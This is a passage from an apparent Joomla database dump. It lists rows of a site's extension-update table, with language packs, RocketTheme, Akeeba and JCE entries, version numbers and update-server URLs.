Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31068,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31069,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31070,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31071,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31072,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31073,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31074,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31075,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31076,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31077,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31078,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31079,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31080,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31081,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31082,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31083,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31084,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31085,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31086,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31087,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31088,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31089,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31090,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31091,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31092,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31093,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31094,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31095,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31096,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31097,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31098,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31099,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31100,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31101,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31102,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31103,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31104,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31105,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31106,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31107,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31108,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31109,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31110,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31111,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31112,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31113,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31114,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31115,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31116,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31117,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31118,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31119,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31120,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31121,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31122,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31123,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31124,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31125,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31126,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31127,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31128,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31129,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31130,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31131,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31132,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31133,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31134,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31135,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31136,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31137,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31138,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31139,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31140,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31141,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31142,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31143,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31144,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31145,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31146,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31147,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31148,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31149,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31150,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(31151,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31152,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31153,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31154,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31155,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31156,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31157,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31158,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31159,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31160,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31161,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31162,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31163,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31164,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31165,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31166,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31167,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31168,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31169,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31170,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31171,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31172,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31173,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31174,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31175,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31176,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31177,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31178,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31179,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31180,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31181,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31182,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31183,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31184,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31185,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31186,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31187,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31188,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31189,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31190,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31191,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31192,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31193,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31194,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31195,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31196,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31197,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31198,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31199,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31200,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31201,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31202,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31203,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31204,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31205,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31206,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31207,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31208,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31209,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31210,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31211,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31212,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31213,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31214,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31215,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31216,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31217,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31218,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31219,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31220,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31221,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31222,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31223,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31224,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31225,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31226,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31227,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31228,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31229,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31230,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31231,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31232,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31233,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31234,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31235,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31236,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31237,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31238,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31239,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31240,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31241,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31242,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31243,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31244,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31245,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31246,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31247,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31248,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31249,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31250,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31251,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31252,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31253,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31254,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31255,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31256,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31257,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31258,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31259,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31260,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31261,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31262,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31263,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31264,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31265,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31266,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31267,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31268,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31269,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31270,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31271,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31272,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31273,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31274,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31275,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31276,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31277,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31278,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31279,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31280,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31281,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31282,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31283,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31284,57,0,'English, New 